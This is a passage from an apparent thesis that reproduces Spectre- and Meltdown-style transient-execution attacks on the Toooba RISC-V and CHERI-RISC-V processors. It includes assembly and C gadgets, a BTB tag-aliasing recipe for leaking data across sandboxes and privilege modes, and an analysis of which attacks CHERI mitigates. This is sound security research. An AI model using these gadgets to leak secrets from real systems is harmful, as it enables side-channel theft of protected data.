Following Canella et al. [19], all Spectre-style attacks can be conducted in-place
and out-of-place. However, throughout my thesis work, Spectre-BTB
is the only attack where I attempted both attack types. In Figure 4.1, both the
in-place and the out-of-place variants are depicted. On the left side, the two
indirect jumps are mapped to the same BTB entry and therefore one jump can
impact the prediction of another jump. The exact explanation of why and how
a BTB entry is aliased in Toooba is given in Section 5.1.3. On the right side of
Figure 4.1, there is only one jump that trains the BTB. Depending on whether
funct is called from call_0 or call_1, the jump will take different directions.
Therefore, previous calls to funct impact the branch target prediction
of that jump. Both attacks reach the same goal, which is training a BTB entry.
I reproduced both attacks with code similar to the one shown in Figure 4.1
and both attacks were successful. For the remainder of this thesis, I only use
Spectre-BTB out-of-place, as I believe it is more convenient for an attacker to
directly poison the BTB instead of indirectly calling another function. There-
fore, I will use the abbreviation Spectre-BTB for the out-of-place variant.
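In C, the same situation arises with an indirect call through a function pointer: the call site is trained with one target, then the pointer is switched, and the BTB prediction lags behind the architectural target. A sketch with illustrative function names:

```c
/* Two possible targets of an indirect call. During training, dispatch()
 * repeatedly jumps to benign(); once the attacker swaps the pointer, the
 * BTB still predicts benign() while gadget() is the architectural target. */
static int benign(void) { return 0; }
static int gadget(void) { return 1; }   /* attacker-chosen speculation target */

typedef int (*target_fn)(void);

/* A single indirect call site, compiled to a jalr/cjr whose target the
 * BTB predicts from previous executions. */
int dispatch(target_fn fn)
{
    return fn();
}
```

Architecturally the switched call always reaches gadget(); the attack lives entirely in the window before the BTB misprediction is resolved.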
800000c8: jr t1
...
800202c8: jalr t1

call_0:
la a0, addr_0
jal ra, funct
...
call_1:
la a0, addr_1
jal ra, funct
...
funct:
jr a0

Figure 4.1: Left: Spectre-BTB out-of-place; right: Spectre-BTB in-place.

4.1.4 Spectre-RSB
The goal of Spectre-RSB attacks is to create a mismatch between hardware
and software return addresses. In order to reproduce this attack, I created
exemplary code, which fetches its return address from memory and returns
to this address. This does not match the address predicted by hardware and
therefore allows an attacker to alter control-flow in speculation. I conducted
a similar attack for CHERI-RISC-V processors and because of redundancies,
the attack is only thoroughly explained in Section 5.1.5.
Another option to create a mismatch between the software and hardware
return address stacks is to – if allowed by hardware – let the RSB overflow [23,
24]. In Toooba, the RSB has room for eight return addresses. If the call depth
is greater than eight function calls, the subsequent return addresses will over-
write the ones already present. This can be used by an attacker to conduct a
Spectre-RSB attack as well. I created an attack that causes a recursive function
to call itself more than eight times. This fills all entries of the RSB with
return addresses pointing to instructions in the code of the recursive function.
The returns to the recursive function will be predicted correctly, but the jump
returning to the calling function will be mispredicted and will execute parts of
the recursive function one more time, which reads out-of-bounds values in my
example.
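The recursion-based variant can be sketched in C; the depth constant reflects Toooba's eight-entry RSB, while the cache-encoding part of the attack is elided:

```c
#define RSB_DEPTH 8   /* Toooba's return-address stack holds 8 entries */

/* Recurse deeper than the RSB. Each call pushes a return address; past
 * depth 8 the oldest entries are overwritten. Returns from the inner
 * calls are predicted correctly, but the final return to the original
 * caller uses a stale RSB entry and is mispredicted, transiently
 * re-executing part of this function. */
int recurse(int depth)
{
    if (depth == 0)
        return 0;
    return 1 + recurse(depth - 1);
}
```

Calling recurse(RSB_DEPTH + 2) is already enough to wrap the RSB; in my experiments the transiently re-executed code performs the out-of-bounds read.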
4.1.5 Spectre-STL
Spectre-STL is based on memory disambiguation making wrong predictions.
I successfully conducted the attack described in Figure 2.4. Again, the repro-
duction in CHERI-RISC-V assembly is similar and therefore the exact reasons
will be described in Section 5.1.6. This attack will be referred to as Spectre-
STL-Load.

               asm
Meltdown-US     ✗
Meltdown-GP     ✗

Table 4.2: Overview of attempted Meltdown-style attacks on RISC-V Toooba and whether they were successful.

Besides revealing a secret through two loads, the attacker can follow
another goal: jumping to an arbitrary target. This attack is referred to
as Spectre-STL-Jump. It is based on the same principles as Spectre-STL-Load.
However, the attack requires a preparation phase in which the attacker inserts
a valid code address. This code address is stored at the address whose content
is loaded twice due to wrong memory disambiguation. Therefore, the load that
is predicted to be independent does not load a secret value, but a valid code
address. If this code address is used in a jump before Toooba recognises that
its memory disambiguation was wrong, the attacker will be able to jump to an
arbitrary target.
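The Spectre-STL-Load pattern boils down to a store, an aliasing load, and a dependent probe access. A hedged C sketch (in the real attack the aliasing is controlled at the assembly level, and a compiler may forward the store itself):

```c
#include <stdint.h>

/* One 64-byte probe line per possible byte value. */
static uint8_t probe_array[256 * 64];

/* Store-to-load gadget: if memory disambiguation predicts the load to be
 * independent of the preceding store, the load transiently returns the
 * stale value at *addr and the dependent access encodes it in the cache.
 * Architecturally, the function always returns new_value. */
uint64_t stl_gadget(volatile uint64_t *addr, uint64_t new_value)
{
    *addr = new_value;            /* store may linger in the store queue    */
    uint64_t loaded = *addr;      /* load: predicted independent -> stale?  */
    volatile uint8_t sink = probe_array[(loaded & 0xff) * 64];
    (void)sink;                   /* dependent probe access                 */
    return loaded;
}
```

For Spectre-STL-Jump, the stale value is not probed but used as a jump target before the misprediction is resolved.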
4.2 Meltdown Attacks
In this section, I describe the Meltdown-style attacks attempted on RISC-V
Toooba. The attacks and their respective outcomes are summarised in Ta-
ble 4.2, which shows that none of the attempted attacks could be conducted
successfully. However, these two attacks are an essential part of the test suite
as their analysis shows how to prevent them. Furthermore, it is important to
test new implementations such that no conventional Meltdown-style attack is
possible.
4.2.1 Meltdown-US
For Meltdown-US, I created a scenario resembling the situation when a real
operating system is running. In my setup, the operating system code runs in S
privilege mode and has its own code and data page. The U(ser) bit is cleared for
both S mode pages, which means that U mode code cannot access these pages.
The attacker code runs in U privilege mode and also has its own code and data
page. Similar to Meltdown-US-CHERI presented in Section 5.2.1, the attacker
tries to access data without having sufficient permission – in Meltdown-US at
the granularity of 4 KiB pages.

[Figure 4.2 block diagram: ExeMem stage → TLB request → FinishMem stage → checks → reorder buffer.]

Figure 4.2: The last two stages of the Toooba memory pipeline, which perform permission and capability checks.
The translation from virtual to physical addresses is conducted in the last
stage of the memory pipeline in Toooba as shown in Figure 4.2. The ExeMem
stage sends the request to the Translation Lookaside Buffer (TLB) and the
FinishMem stage receives the corresponding response. Besides the physical
address, the access rights are available at this stage as well. Therefore, the
exception – a page fault – will be recorded in the cause field of the Load-Store
Queue (LSQ) entry of this memory access. This load will never be issued, and
thus Meltdown-US is not possible on Toooba.
4.2.2 Meltdown-GP
The Meltdown-GP attack seeks to read a register that the code has no permission
to read. In my reproduction of the Meltdown-GP attack, user mode
code attempts to read the CSR mcause, which is forbidden as this register is
only accessible by M mode code. The CSR access is followed by a load to
an attacker-accessible array in order to make the secret visible.
However, as marked in Table 4.2, the Meltdown-GP attack is not possible
on Toooba. Checking which privilege mode is necessary is done as a part of
the Rename stage in Toooba. If the necessary privilege mode is not present,
the Rename stage will modify the respective Reorder Buffer (ROB) entry so
that the cause field is set to the exception to be raised. Furthermore, the in-
struction is marked as executed in the entry, which means that it never enters
the ALU pipeline. Therefore, the result will never be produced, which mitigates
the attack as the following transient instruction sequence cannot reveal
the secret register value.
Chapter 5
CHERI-RISC-V Results
The main part of my thesis work was to extend my test framework for CHERI-
RISC-V processors. This collection of attacks shows how to practically use the
base framework presented in Chapter 4. In this chapter, I investigate whether
CHERI mitigates transient-execution attacks and how effective CHERI is in
that case. To my knowledge, this work is the first to practically reproduce
any transient-execution attack on a CHERI-RISC-V system. The attacks pre-
sented in this chapter extend the conventional attacks presented in Chapter 4.
Furthermore, I will introduce a new transient-execution attack subclass that
allows attackers to forge arbitrary and powerful capabilities in Toooba.
5.1 Spectre Attacks
As shown in Table 5.1, I successfully reproduced all four main Spectre attacks
and several applications of them on CHERI-RISC-V systems. In this section, I do
not describe every attack thoroughly as some of them have large similarities. In
this thesis work, I carried out examples in C as well. As depicted in Table 5.1,
these could be conducted successfully, but they will not be described in this
section as they do not pose a significant contribution to the vulnerability profile
of Toooba. However, an exemplary C attack is described in Appendix A.
5.1.1 Spectre-PHT
The CHERI-assembly code of my reproduction of the Spectre-PHT attack is
depicted in Figure 5.1. This is a close reproduction of the original work by
Kocher et al. [22] that has been introduced in Section 2.2.1. The example
checks whether an index (held in a0) is less than a global comparison variable
                   CHERI asm   CHERI C
Spectre-PHT           ✓/✗        ✓/✗
Spectre-PHT-Write      ✗          -
Spectre-BTB            ✓          ✓
Spectre-RSB            ✓          ✓
Spectre-STL-Load       ✓          ✓
Spectre-STL-Jump       ✓          -
CHERI-Sandboxes        ✓          -
Priv-Mode-Regs         ✓          -
Priv-Mode-Exec         ✓          -

Table 5.1: Overview of attempted Spectre-style attacks on CHERI-RISC-V Toooba and whether they were successful. Spectre-PHT is classed as (✓/✗) as its success depends on the concrete capability configuration.
(stored at the address pointed to by ca2). If this is the case, an array holding
secret values (with its base address being held in ca1) will be accessed at index
a0. The resulting value will be used as the index to another array (with its base
address being held in ca3). In this example, I assume that the memory ad-
dresses pointed to by ca3 are also visible to the attacker, e.g., a shared memory
page between the victim and the attacker. Furthermore, I assume that ca1 al-
lows access to more addresses than [ca1.baseaddr, ca1.baseaddr+length−1],
where length is the global comparison value stored at the address pointed to
by ca2. This can either be caused by capabilities not being configured suit-
ably or by bounds not being exactly representable due to bounds compression
as it is done with 128-bit capabilities [38].
In my example, I decided to train Toooba’s tournament predictor to always
choose the local predictor, which will then return not taken. In order to reach
that, I call the assembly code in Figure 5.1 eight times with values for a0 such
that a0 ∈ [0, ..., 0x1f] holds. This will train the local BHT to return not
taken for this particular branch and train the selector to always choose the local
predictor for this branch. My choice for the other parameters remains the same
over the training phase and is shown in Table 5.2. After the training phase, the
attacker can start the actual attack.
For the actual attack, I choose the index to the secret array to be 0x40
(a0 = 0x40). For all other parameters, I use the values presented in Table 5.2.
As a preparation of the attack, I ensure that the load to the address stored in
// a0: index to secret array
slli t1, a0, 3
cincoffset ca1, ca1, t1 // ca1: secret array base addr.
cld t0, 0(ca2) // ca2: comparison value
bge a0, t0, end
cld t2, 0(ca1) // access secret value
// use spec. execution
cincoffset ca3, ca3, t2 // ca3: shared mem. page
cld t2, 0(ca3)
end:
// other code
Figure 5.1: Reproduction of the Spectre-PHT attack in CHERI assembly.
Capability Reg   Description
ca1              capability spanning [0x80001000, 0x80001fff]
ca2              capability spanning [0x80002000, 0x80002007];
                 8-byte value 0x20 stored at this address
ca3              capability spanning [0x80003000, 0x80003fff]

Table 5.2: Parameter configuration used for the Spectre-PHT attack.
ca2 will miss all caches. This is important to the attacker as the outstanding
load poses a dependency to the following branch instruction. Because of the
previous training phase, the branch bge will be predicted to not taken. This
means that from this point on the code following the branch instruction will be
mispredicted and therefore executed transiently. Due to the outstanding load
the misprediction cannot be resolved for the entire miss penalty time of the
load. The first speculative load following the mispredicted branch instruction
will be a memory access to the address 0x80001200 returning the value 0x200
in my example. This value is added in the next instruction to ca3, which points
to a memory region also accessible to the attacker. However, the first load was
illegal because the code does not allow accesses to addresses 0x80001100 or
greater. Later, Toooba will resolve this and roll back the speculatively executed
instructions, but the second load to an attacker-accessible array has already
been issued and can be detected by the attacker.
This attack is classed as (✓/✗) as its success depends on the configuration
of the capability used for the first load. In both cases the code forbids the
first memory access, but the capability configuration is different in these two
instances of Spectre-PHT. If the capability is configured such that the mem-
ory access is out of capability bounds, the attack will not work. Otherwise,
the attack will work. For the explanation of why the capability configuration
mitigates the attack, see Section 5.2.1.
The important factor in this attack is the miss penalty of the load through
ca2. If this load, which misses all caches, returns before the second load has
been issued, the attack will not be successful: Toooba will detect the misprediction
and not issue the second load, and thus the attacker cannot detect the
timing difference through the cache later. In my simulation, it took the load
61 cycles from leaving the core until the value returned. The first speculative
load is issued one cycle later and the second speculative load seven cycles
after the first load. Therefore, Spectre-PHT works as 53 cycles are left. This
means that an attacker can effectively use the spare cycles for executing other
transient instructions that reveal more complex internal state, e.g. shifting and
adding register values and then performing a load dependent on this data.
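The addresses and the cycle budget in this example can be reproduced arithmetically from the values in Table 5.2 and the simulation (a worked example; the function names are mine):

```c
#include <stdint.h>

/* Values from Table 5.2 and the simulation run. */
#define SECRET_BASE  0x80001000ULL /* base address held in ca1          */
#define LENGTH       0x20          /* comparison value stored via ca2   */
#define ATTACK_INDEX 0x40          /* a0 chosen for the attack          */
#define MISS_PENALTY 61            /* cycles until the ca2 load returns */
#define LOAD1_DELAY  1             /* first speculative load: +1 cycle  */
#define LOAD2_DELAY  7             /* second load: 7 cycles after first */

/* slli t1, a0, 3 scales the index by 8 (double-words). */
uint64_t accessed_address(void)
{
    return SECRET_BASE + ((uint64_t)ATTACK_INDEX << 3);
}

/* First address beyond what the code may legally access. */
uint64_t first_illegal_address(void)
{
    return SECRET_BASE + (uint64_t)LENGTH * 8;
}

/* Transient window left after both speculative loads have issued. */
int spare_cycles(void)
{
    return MISS_PENALTY - LOAD1_DELAY - LOAD2_DELAY;
}
```

This reproduces the numbers above: the transient access lands at 0x80001200, the legal region ends before 0x80001100, and 53 spare cycles remain in the transient window.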
5.1.2 Spectre-PHT-CHERI-Write
When code is using capabilities in Toooba, this attack is successfully mitigated
by CHERI. In my example, the attacker writes a double-word to memory,
which effectively clears the tag bit of the capability stored at this address, as
the stored data is not a capability itself. Therefore, when the load of the return
address is conducted, this will lead to an invalid code capability being stored
into the return address register. Toooba cannot jump to this capability and
therefore this specific attack is successfully mitigated. Furthermore, a suitable
capability configuration, which enforces tight bounds, mitigates this specific
attack and variants of it in the first instance as described in Section 4.2.1.
5.1.3 Spectre-BTB on CHERI-Sandboxes
Sandboxes are designed to have strong memory protection against each other.
One sandbox is not allowed to leak secrets to another sandbox. Inspired by
Jonathan Woodruff and Jessica Clarke, I created an example that allows an
adversary sandbox to leak information from another sandbox. Software com-
partmentalisation is one of the main goals of CHERI – this attack has specif-
ically been designed to circumvent compartmentalisation and leak secrets of
a victim sandbox. This example contains two sandboxes. One of them is an
sand1_code:
// load capability to jump to
clc ct1, 16(ct6)
// load pcc into cs7
auipcc cs7, 0
// this jump is aliased in the BTB
cjr ct1
Figure 5.2: Code snippet of victim code in a sandbox which is under attack.
adversary sandbox, the other one is benign. The benign sandbox is referred to
as sand1, whereas the attacker sandbox is called attackbox.
The code of sand1, which is the victim sandbox being attacked by attack-
box, is depicted in Figure 5.2. The first instruction in the code of sand1 loads
a capability from memory and the last instruction jumps to it. The second in-
struction, auipcc, adds the second operand – shifted by 12 bits to the left –
to the current PCC. Since the second operand is zero in this example, auipcc
writes the current PCC to cs7. This is a common way to produce capabilities
for accessing data in CHERI-RISC-V and is regularly used by CHERI-LLVM.
Attacking Toooba’s BTB
The goal of the attack is to trick Toooba into speculatively jumping from the
benign sandbox sand1 into the attacker sandbox attackbox. Speculation for
indirect jumps – these are jumps like cjr ct1 – is done with help of the
BTB. To fully understand the design of the attack, I need to explain Toooba’s
BTB and the hashing function I added. The BTB is an indexed array with 256
entries of the form depicted in Figure 5.3. An entry has three fields: one valid
bit, an 8-bit tag, and the destination PCC target. When a jump is taken, a BTB
entry will be updated. The index of this entry is determined by PCCj[8 ∶ 1],
where PCCj is the PCC of the jump instruction. PCCj[X ∶ Y ] denotes a
selection of bits X down to Y from PCC, where the index 0 is the Least
Significant Bit (LSB) and index bitfield.length − 1 is the Most Significant
Bit (MSB) of a bit field. The tag is calculated by splitting up the address of
PCCj into bytes and XOR-ing all eight bytes. The target PCC is the PCC to
be executed in case the jump is taken. If a BTB entry is updated, its valid bit
will be set. The valid bit of each entry is zero at the start-up of the branch
predictor or if cleared by hardware, e.g., if branch-prediction state flushing is
implemented as described in Section 2.3.2. When a branch prediction from the BTB is
V (1 bit) | Tag (8 bits) | Target (129 bits)
Figure 5.3: Fields of an entry in Toooba’s BTB.
required, the index and the tag for that PCC are calculated; only if the valid
bit at that index is set and the calculated tag equals the tag stored at that
index is the prediction deemed valid, and Toooba will speculate to the target
PCC of this entry.
The attacker wants to place an entry into the BTB so that the jump in Fig-
ure 5.2 speculatively leads to attacker chosen code execution when the victim
sandbox sand1 executes the next time. For this attack, I assume that the at-
tacker can freely choose the address where their code is placed in the address
space. In order to alias a BTB entry, an attacker needs to place a jump in-
struction at an address so that the following requirements are fulfilled, where
PCCb is the PCC of the jump in the victim sandbox, PCCa is the PCC of the
jump in the attacker sandbox, addr() is the function that extracts the address of its
argument PCC, and tag() is the function that calculates the tag by XOR-ing
the bytes of the respective PCC:
PCCb[8 ∶ 1] = PCCa[8 ∶ 1] (5.1)
tag(addr(PCCb)) = tag(addr(PCCa)) (5.2)
Mapping the attacker jump instruction to the same index in the BTB is
an easy task for an attacker. The more interesting task is to align the PCC of
the attacker jump instruction so that the tag value equals the tag of the victim
sandbox PCC tag. The sandbox to be attacked – sand1 – has a PCC with
the start address 0x80020000 and the length is 0x2000. The jump instruction
cjr ct1 is at the PCC 0xffff200000018005_0000000080020244. This is
the entire 128 bit code capability. As depicted in Figure 2.5, the upper 64 bits
contain the otype, the permissions, and the compressed bounds whereas the
lower 64 bits contain the actual address. The address is important in this attack
scenario and therefore separated by an underscore character from the rest of
the capability. I did not include the tag bit for capabilities in the description in
this subsection. It is obvious that all capabilities need to have valid tag bits in
order to be used for jumping and dereferencing memory. I chose the attacker
sandbox attackbox to start at the address 0x80040000 and have a length of
0x20000. I decided to choose 0xffff20000001a001_0000000080040444 as
the PCC for the jump. With that I wanted to demonstrate that it is possible
to conduct the attack in a single address-space operating system and that both
victim and attacker sandbox do not need to have the same bounds:
PCCb = 0xffff200000018005_0000000080020244 (5.3)
PCCa = 0xffff20000001a001_0000000080040444 (5.4)
tag(addr(PCCb)) = tag(addr(PCCa)) = 0xc4 (5.5)
PCCb[8 ∶ 1] = PCCa[8 ∶ 1] = 0x22 (5.6)
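These values can be checked with a small model of the index and tag calculation described above (a sketch of the described hashing, not Toooba's actual Bluespec code):

```python
# Model of Toooba's BTB index and tag calculation, used to verify the
# aliasing of the victim and attacker PCCs (addresses from the text).

def btb_index(addr):
    # bits [8:1] of the PCC address select one of the 256 BTB entries
    return (addr >> 1) & 0xFF

def btb_tag(addr):
    # XOR of all eight bytes of the 64-bit address
    tag = 0
    for i in range(8):
        tag ^= (addr >> (8 * i)) & 0xFF
    return tag

addr_b = 0x0000000080020244  # victim jump in sand1
addr_a = 0x0000000080040444  # attacker jump in attackbox

assert btb_index(addr_b) == btb_index(addr_a) == 0x22
assert btb_tag(addr_b) == btb_tag(addr_a) == 0xC4
```

Both conditions (5.1) and (5.2) hold, so the attacker's entry aliases the victim's in the BTB.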
Conducting the Attack
Now that we understand how to alias an entry in the BTB, the most important
part of the attack is done. The next step the attacker needs to conduct is to
actually place an entry at the respective index – this can be considered the
training phase of the BTB. In order to achieve this, the attacker
runs its code – including the jump at PCCa – that branches to an attacker
chosen target. This target is the gadget the victim sandbox will speculatively
jump to during the actual attack. Suitable targets are explained in the follow-
ing paragraphs. The second training step is to ensure that the first instruction
in Figure 5.2 misses all caches in order to successfully misspeculate as long
as possible. If this was not the case, Toooba would quickly load the correct
PCC to jump to and correct its misspeculation before the transient-execution
sequence in the target gadget could take effect. After this training phase, the
attacker triggers or awaits the next execution of sand1. The load will miss all
caches and Toooba will speculatively jump to the attacker’s gadget with the
entire register state of sand1 being present.
The attacker can use the register state from sand1 in multiple ways to
achieve different goals of their attack. First, the attacker can leak one or more
secret values stored in a register. This can be the case if sand1 computes on
secret data, e.g., an encryption key. In order to reveal the secret, the attacker
performs a load to an attacker-accessible array indexed by the secret. Second,
the register state can give the attacker access to a memory location of inter-
est, e.g., because only sand1 has a capability to this memory location. The
attacker loads the value of interest and conducts a second load to an attacker
accessible array indexed by that value in order to reveal it. Furthermore, it
is possible to load other capabilities through capabilities being present in the
current register state of the victim. In my example of the attack, I sought to use
the second method. The load missing all caches needs 88 cycles from being
issued to memory until returning to the core. The first speculative memory
access in the gadget fetching the secret into the core is issued with 20 cycles
left and the revealing load with 12 cycles left, which explains why the attack
is successful.
This sandbox attack includes the basic Spectre-BTB attack as demonstrated
in [22]. The pure Spectre-BTB attack has also been reproduced in this thesis
work, but will not be shown since its mechanism is included in this attack.
Furthermore, I produced other Spectre-BTB attacks, e.g., attacking direct
jumps and similar variants. However, these were either not successful or could
not contribute to attacking Toooba in a way not already explained. Therefore,
I do not discuss these attacks further in this text.
5.1.4 Priv-Mode Attacks
The sandbox attacks raise the question of whether it is possible to speculate
across different privilege modes in RISC-V. I constructed two attacks proving
the hypothesis that it is possible, which are referred to as Priv-Mode-Regs and
Priv-Mode-Exec in Table 5.1. For both attacks, the scenario is that privileged
code, e.g., kernel code, is being executed in S privilege mode, whereas the at-
tacker code resides in U privilege mode. The goal of both attacks is to specula-
tively jump to the gadget chosen by the attacker. This scenario can be found in
real-world attacks as well, since operating systems usually run in S privilege
mode in RISC-V [12]. A real-world attack for this scenario is further explained in
Section 6.1.4. None of the priv-mode attacks is possible if the Supervisor User
Memory (SUM) bit is cleared in sstatus. This mechanism prevents code
running in S mode from accessing pages that are accessible by U mode code1.
The SUM mechanism and related principles are thoroughly explained in the
privileged specification [12].
Priv-Mode-Regs
This attack is close to the sandbox attack presented in Section 5.1.3. The goal
of this attack is to speculatively jump from S privilege mode to U privilege
mode in order to use the register state set up by the S mode code. The two
main parts of the attack are again aliasing an entry in the BTB and delaying
a load such that a jump depending on that load will speculatively lead to the
execution of the attacker’s chosen gadget residing in U mode. As in the
sandbox attack, the goal of the attacker is to make use of the register state
1 Code pages accessible by U privilege mode code have the U(ser) bit set in the respective
PTE.
of the S mode code by either leaking a value from or through the register
state. I constructed an attack that manages to leak a value through a powerful
capability of the kernel being present in the current register state. Another
particularly interesting target are Special Capability Registers (SCRs) as they
are expected to hold powerful capabilities.
Priv-Mode-Exec
The difference of this attack compared to the Priv-Mode-Regs attack is that
the attacker-chosen gadget makes use of the fact that the processor continues
to execute in S privilege mode in speculation. This means that the attacker has
permission to access CSRs. In my example, the gadget accesses sscratch –
which has been previously written to by the kernel – and then performs a load
to an attacker accessible array indexed by the value in sscratch. This attack
requires the PCC in U privilege mode to have its Access System Registers
(ASR) permission set, as ASR restricts access to both CSRs and SCRs. RISC-V
constrains access to CSRs by privilege mode, but CHERI-RISC-V adds the ASR
functionality on top. ASR restricts access to all CSRs except seven white-listed
ones, in which sscratch is not included [37]. This attack demonstrates how
to make use of the register values accessible to the code the speculative jump
came from.
For this attack, it is important to understand that the privilege mode a
RISC-V microprocessor currently operates in is an internal state and can only
be influenced by traps and their respective return operations. Furthermore,
this means that code can be executed in every privilege mode as long as it
does not contain privilege mode specific instructions, as for example mret
that can only be used in M privilege mode. A mret instruction executed in S
or U privilege mode will lead to an exception being raised. In my example the
revealing gadget is executed in both S and U privilege mode.
5.1.5 Spectre-RSB
Similar to the BTB, the RSB can contain powerful capabilities that can be of
use for an attacker. The code depicted in Figure 5.4 shows an example of priv-
ileged code that is called from user space. First, the code loads a new address
into the return address register cra. Next, the code loads its PCC into a reg-
ister, adds an offset to the capability address and stores a secret value to this
memory location. Finally, the code returns to the address previously loaded
into cra. However, Toooba will predict the return address and use the top
entry of the RSB for the prediction. This entry is a capability pointing to the
kernel_funct:
// load new return address
clc cra, 0(cs2)
// load kernel pcc into ct6
auipcc ct6, 0
li t1, 0x200
cincoffset ct6, ct6, t1
li t1, 0x400
// store secret
csd t1, 0(ct6)
// return
cret
Figure 5.4: Privileged code whose return address will be mispredicted in the
Spectre-RSB attack.
next instruction of the calling function. The RSB contains this entry because
the call to the privileged function caused the hardware to push it there. There-
fore, Toooba will speculatively jump to unprivileged code with the register
state of the privileged code. In fact, Toooba will always speculatively jump to
the next instruction of the calling code in the example depicted in Figure 5.4.
Later, Toooba will jump to the actual PCC when it realises its misspeculation.
Spectre-RSB gives the attacker the same possibilities to make use of the reg-
ister state of the privileged code as Spectre-BTB does. I created an example
that uses a powerful capability in the speculative register state in order to pull
a secret into the core and make it visible to the attacker via a second load.
What this attack needs is a mismatch between the software return address
and the address stored in the RSB. In my example, this is achieved by loading
another address into cra. For the attack to work, I made this load miss all
caches. This gives attackers the biggest possible time window to transiently
perform other loads that make the secret visible. As described in Section 4.1.4,
overflowing the RSB can also create a mismatch between hardware and soft-
ware return addresses. I successfully conducted this attack type in CHERI-
RISC-V assembly as well. Note that this only works if the capabilities allow
these memory accesses following previous explanations.
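The hardware/software return-address mismatch that this attack relies on can be modelled with a minimal sketch (the addresses are made-up illustrative values, not the ones from my experiment):

```python
# Toy model of the RSB behaviour exploited by Spectre-RSB: the hardware
# pushes the caller's next PC on every call and pops it on every return,
# so overwriting cra in software makes the prediction disagree with the
# architectural return target.

rsb = []

def call(return_addr):
    rsb.append(return_addr)       # hardware pushes the caller's next PC

def ret(software_target):
    predicted = rsb.pop()         # prediction uses the top RSB entry
    return predicted, software_target

call(0x80000100)                  # user code calls kernel_funct
# kernel_funct overwrites cra (clc cra, 0(cs2)) with another address
predicted, actual = ret(software_target=0x80003000)
assert predicted == 0x80000100    # speculative jump back into user code
assert predicted != actual        # mismatch opens the transient window
```

While the slow load of the new cra is outstanding, the core follows the predicted address with the privileged register state still live.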
clc ca1, 0(cs1)
// ca1 and cs2 hold the same capability
csd a4, 0(ca1)
// memory disambiguation will lead to
// this being executed with stale data
cld a2, 0(cs2)
cincoffset cs3, cs3, a2
cld a3, 0(cs3)
Figure 5.5: Reproduction of the Spectre-STL attack in CHERI-RISC-V as-
sembly.
5.1.6 Spectre-STL
Spectre-STL-Load and Spectre-STL-Jump both rely on the fact that memory
disambiguation predicts a store-load pair to be independent although they ac-
cess the same memory address. As shown in Table 5.1, both Spectre-STL
variants work in CHERI-RISC-V Toooba.
Spectre-STL-Load
The code depicted in Figure 5.5 shows the sequence of instructions build-
ing the actual attack. The first instruction loads the capability at the address
pointed to by cs1 into ca1. I constructed the attack such that cs2 is stored
at this memory address. In my example, ca1 and cs2 are identical capabil-
ities, but in order for the attack to be successful they only need to point to
the same memory address. The following store and load instructions are ex-
ecuted out-of-order under the assumption that they are independent, since
they use different capability registers for their memory accesses. However, this
is not the case, as both the store and the load go to the same memory address.
The load is executed earlier than the store and therefore does not return the
data of the store, but the previous content stored at this memory address. The
transient-instruction sequence following the load of the stale data will reveal
the secret data. Issuing a load of a value indexed by the secret to an attacker
accessible array with its base address stored in cs3 makes the secret visible
to the attacker.
Toooba’s memory disambiguation and out-of-order execution enable this
attack. When a memory instruction reaches the Rename stage, one instruction
per cycle is enqueued to the memory reservation station from which the mem-
ory pipeline pulls out its instructions. The memory pipeline will execute the
instructions as soon as all source register values are available. Toooba does
not have a dedicated unit for disambiguating memory accesses – it assumes
that memory accesses through different registers are independent. In case they
are dependent, Toooba will perform a rollback and re-execute the affected instructions.
In my example, the first load introduces a delay for the second instruction as
they overlap in architectural register use. The second instruction cannot pro-
ceed in the memory pipeline. However, the third instruction can proceed in the
memory pipeline and produce its result as it does not overlap in architectural
register use. This leads to the transient-instruction sequence being executed
with stale memory data.
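The misprediction described above can be illustrated with a toy model (addresses and values are made up; this sketches the ordering effect, not Toooba's pipeline):

```python
# Toy model of Spectre-STL-Load: because the store (through ca1) and the
# load (through cs2) use different registers, the core assumes they are
# independent and lets the younger load execute first, so it returns the
# stale value at the shared address.

memory = {0x1000: 0x11}   # stale secret-selecting value at the shared address

def run(load_first):
    mem = dict(memory)
    if load_first:               # mispredicted order: load bypasses the store
        loaded = mem[0x1000]
        mem[0x1000] = 0x400      # csd a4, 0(ca1) takes effect too late
    else:                        # architecturally correct order
        mem[0x1000] = 0x400
        loaded = mem[0x1000]
    return loaded

assert run(load_first=True) == 0x11    # transient execution sees stale data
assert run(load_first=False) == 0x400  # result after rollback/re-execution
```

The stale value feeds the dependent `cincoffset`/`cld` pair, which leaves the cache footprint the attacker later probes.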
Spectre-STL-Jump
The setup for this attack is similar to the attack on RISC-V Toooba presented
in Section 4.1.5 with the difference that capabilities are used instead of in-
teger pointers. The fact that the stale value being loaded is not data, but a
valid code capability does not change the feasibility of this attack. The code
capability is valid and therefore Toooba takes the indirect branch to this ca-
pability’s address. Analogously to Spectre-STL-Load, the memory accesses
are not out-of-bounds and hence CHERI does not prevent this sequence of
speculative instructions. The attack works because Toooba generally assumes
memory operations not to be dependent as described above.
5.2 Meltdown Attacks
Table 5.3 shows an overview of the Meltdown attacks reproduced on CHERI-
RISC-V Toooba during this thesis work and whether they were successful.
Analogous to the presentation of the Spectre attacks, some attacks show large
similarities and therefore the common attack techniques are explained only once.
5.2.1 Meltdown-US-CHERI
Meltdown-US-CHERI is an adaption of Meltdown-US. Instead of attempting
to read from a page, which the attacker does not have sufficient rights to ac-
cess, I attempted to read from a memory address through a capability out of
its bounds. This attack is especially tailored to CHERI – the results of the re-
production of the original Meltdown-US attack are presented in Section 4.2.1.
Attack              CHERI asm
Meltdown-US-CHERI       ✗
Meltdown-GP-CHERI       ✗
CBuildCap-Load          ✓
CSetBounds-Load         ✓
CInvoke-Load            ✓
CUnseal-Load            ✓
Table 5.3: Overview of attempted Meltdown-style attacks on CHERI-RISC-V
Toooba and whether they were successful.
The code for the attack is shown in Figure 5.6. The attack consists of three
basic parts. First, the attacker increases the offset to a desired address out of
capability bounds. Note that in CHERI, setting the address out of bounds is
not itself an illegal operation, but the memory access is. This memory access,
done with the second instruction, is the next part of the attack and loads the
desired secret into register t2. The following two
instructions are the final part of the attack and reveal the secret by a load to an
attacker accessible array with its base address in ct1.
However, this attack could not be conducted successfully in CHERI-RISC-
V Toooba. Its memory pipeline consists of multiple stages that dispatch the
instruction, read the register values, calculate the virtual address, translate the
virtual address to the physical address, and finally enqueue the memory access
into the LSQ. The last two pipeline stages are depicted in Figure 4.2. In the
last pipeline stage, Toooba performs the capability bounds checks and sets the
exception cause field in the corresponding LSQ entry in case an exception is
detected. Toooba only issues valid requests – without the cause field set – to
memory. Therefore, the out of bounds load will never be issued, which effec-
tively mitigates the entire attack. No revealing transient-execution sequence is
possible because the necessary result never becomes available.
